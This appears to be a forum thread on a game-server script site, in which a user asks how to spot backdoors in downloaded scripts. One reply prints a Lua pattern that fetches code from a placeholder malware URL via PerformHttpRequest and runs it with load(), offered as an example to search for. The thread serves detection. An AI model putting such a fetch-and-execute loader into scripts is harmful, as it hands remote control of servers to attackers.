• VIP Lifetime 20 euro this weekend! 25 % off everything: VIP and Credits!

    Its the holiday month, therefor VIP and Credits have been reduced in price!
    VIP does not need any credits to unlock content and download it.
    Payments via Crypto: Please open a ticket, if you experience any issues, or if you miss your coin as an option in the list we have alot of wallets available.

[QUESTION] How to spot a potential backdoor? (1 Viewer)

songbirdmusic_19573

songbirdmusic_19573

Active member
Mar 24, 2024
104
12
18
Credits
191
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
 
VeryNiceIndeed

VeryNiceIndeed

Active member
Jan 10, 2023
159
59
28
Credits
15,140
songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
Click to expand...

That line is perfectly fine for a database
 
songbirdmusic_19573

songbirdmusic_19573

Active member
Mar 24, 2024
104
12
18
Credits
191
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
 
H

Hopatchke

Active member
Aug 3, 2022
52
11
18
Credits
3,411
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
 
songbirdmusic_19573

songbirdmusic_19573

Active member
Mar 24, 2024
104
12
18
Credits
191
Hopatchke said:
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
Click to expand...
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
 
H

Hopatchke

Active member
Aug 3, 2022
52
11
18
Credits
3,411
songbirdmusic_19573 said:
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
Click to expand...
malwarebytes , the free version offers a good scan ;) , works perfectly!
 
amirexit

amirexit

Active member
Sep 1, 2024
194
10
18
Credits
3
songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
Click to expand...
i need to know too thanks for creating this thread
 
songbirdmusic_19573

songbirdmusic_19573

Active member
Mar 24, 2024
104
12
18
Credits
191
Du22121 said:
you never know if they add back doors when its too late
Click to expand...
Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for
 
Malagah

Malagah

Member
Sep 21, 2024
14
1
1
Credits
55
songbirdmusic_19573 said:
Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse toujours mes scripts, puis je recherche manuellement tout mon code et je le soumets à une autre analyse pour être sûr. Il existe des mesures de prévention et des moyens de se protéger, il faut savoir quoi rechercher
Click to expand...
It would be cool to create a topic to explain how to do it and which tool to use :);)
 
khaosen

khaosen

Active member
Mar 17, 2024
159
10
18
Credits
120
songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
Click to expand...
if you want to detect backdoors look for performhttp inside scripts
 
JustScripts
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top